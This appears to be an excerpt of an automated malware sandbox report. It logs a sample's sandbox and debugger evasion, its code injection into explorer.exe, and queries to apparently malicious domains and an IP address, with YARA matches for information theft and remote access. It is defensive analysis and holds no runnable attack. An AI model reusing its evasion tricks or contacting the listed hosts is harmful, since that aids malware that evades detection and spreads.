Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 0000000004426EB0 second address: 000000000442778E instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-0Ch], edx 0x00000005 mov dword ptr [ebp-24h], 0000000Dh 0x0000000c mov eax, 00000001h 0x00000011 cmp eax, 00000000h 0x00000014 jnbe 00007F9AF0396623h 0x00000016 mov eax, dword ptr [ebp-0Ch] 0x00000019 sub eax, dword ptr [ebp-04h] 0x0000001c cmp eax, dword ptr [ebp-24h] 0x0000001f jnl 00007F9AF039662Ah 0x00000021 inc dword ptr [ebp-14h] 0x00000024 jmp 00007F9AF0396C90h 0x00000029 mov eax, 00000000h 0x0000002e cmp eax, 00000000h 0x00000031 je 00007F9AF0396623h 0x00000033 cmp dword ptr [ebp-14h], 02h 0x00000037 jng 00007F9AF039685Ah 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\dfhwrav Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\dfhwrav Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\dfhwrav Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\dfhwrav Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\dfhwrav Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\dfhwrav Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Windows\explorer.exe TID: 644 Thread sleep count: 652 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 5544 Thread sleep count: 1177 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 5544 Thread sleep time: -117700s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 1104 Thread sleep count: 1303 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 1104 Thread sleep time: -130300s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 1320 Thread sleep count: 487 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 1276 Thread sleep count: 1102 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 1276 Thread sleep time: -110200s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 1332 Thread sleep count: 1135 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 1332 Thread sleep time: -113500s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5AF.exe TID: 2588 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\5AF.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 652 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 1177 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 1303 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 487 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 1102 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 1135 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5AF.exe File opened: PHYSICALDRIVE0 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe Code function: 10_2_0040D450 FindFirstFileW,FindClose, 10_2_0040D450
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe Code function: 10_2_004235B0 FindFirstFileW,FindClose, 10_2_004235B0
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe Code function: 10_2_0040CE84 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW, 10_2_0040CE84
Source: C:\Users\user\AppData\Local\Temp\5AF.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: WerFault.exe, 00000013.00000002.551745803.0000000004738000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh$
Source: explorer.exe, 00000001.00000000.294130406.00000000045B0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000000.336477540.00000000081DD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000^
Source: explorer.exe, 00000001.00000000.298060433.0000000006710000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: WerFault.exe, 00000013.00000003.544336242.0000000004B08000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000013.00000002.555779726.0000000004B08000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000001.00000000.303121165.0000000008304000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: 5AF.exe, 00000016.00000002.541764212.0000000002B75000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: K,<=;;?9:VMcI;8
Source: explorer.exe, 00000001.00000000.268546487.00000000082B2000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000001.00000000.268287568.0000000008200000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>&

Anti Debugging

barindex
Source: C:\Users\user\Desktop\file.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\dfhwrav System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0207092B mov eax, dword ptr fs:[00000030h] 0_2_0207092B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02070D90 mov eax, dword ptr fs:[00000030h] 0_2_02070D90
Source: C:\Users\user\AppData\Roaming\dfhwrav Code function: 9_2_006D092B mov eax, dword ptr fs:[00000030h] 9_2_006D092B
Source: C:\Users\user\AppData\Roaming\dfhwrav Code function: 9_2_006D0D90 mov eax, dword ptr fs:[00000030h] 9_2_006D0D90
Source: C:\Users\user\AppData\Roaming\dfhwrav Code function: 9_2_006FC2CB push dword ptr fs:[00000030h] 9_2_006FC2CB
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe Code function: 10_2_025CA0A3 push dword ptr fs:[00000030h] 10_2_025CA0A3
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\dfhwrav Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 688 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402709 LdrLoadDll, 0_2_00402709

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\explorer.exe File created: dfhwrav.1.dr Jump to dropped file
Source: C:\Windows\explorer.exe Domain query: thepokeway.nl
Source: C:\Windows\explorer.exe Network Connect: 123.253.32.170 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: dowe.at
Source: C:\Users\user\Desktop\file.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Roaming\dfhwrav Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Roaming\dfhwrav Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread created: C:\Windows\explorer.exe EIP: 4E619E0 Jump to behavior
Source: C:\Users\user\AppData\Roaming\dfhwrav Thread created: unknown EIP: 4FD19E0 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 688 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe Code function: 10_2_0087C50C InitializeSecurityDescriptor,InitializeAcl,CreateWellKnownSid,CreateWellKnownSid,AddAccessAllowedAce,SetSecurityDescriptorDacl, 10_2_0087C50C
Source: explorer.exe, 00000001.00000000.322936915.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.258688322.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.292482159.0000000001080000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: XProgram Manager
Source: explorer.exe, 00000001.00000000.298015850.0000000005D90000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.322936915.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.268820967.000000000833A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.322936915.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.258688322.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.291794851.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.322936915.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.258688322.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.292482159.0000000001080000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe Code function: GetUserDefaultUILanguage,GetLocaleInfoW, 10_2_0040D588
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 10_2_0040CA28
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: ADCA.exe, 0000000A.00000003.437793710.000000007F700000.00000004.00001000.00020000.00000000.sdmp, ADCA.exe, 0000000A.00000003.450202572.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000000.455797744.0000000004041000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: MSASCui.exe

Stealing of Sensitive Information

barindex
Source: Yara match File source: 0.2.file.exe.2070e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.3.dfhwrav.2080000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.dfhwrav.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.dfhwrav.6d0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.file.exe.2080000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.340150414.0000000002080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.385320932.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.385296441.0000000002080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.373157026.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.247155743.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.327101814.0000000004E61000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.340254010.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

barindex
Source: Yara match File source: 0.2.file.exe.2070e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.3.dfhwrav.2080000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.dfhwrav.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.dfhwrav.6d0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.file.exe.2080000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.340150414.0000000002080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.385320932.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.385296441.0000000002080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.373157026.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.247155743.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.327101814.0000000004E61000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.340254010.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs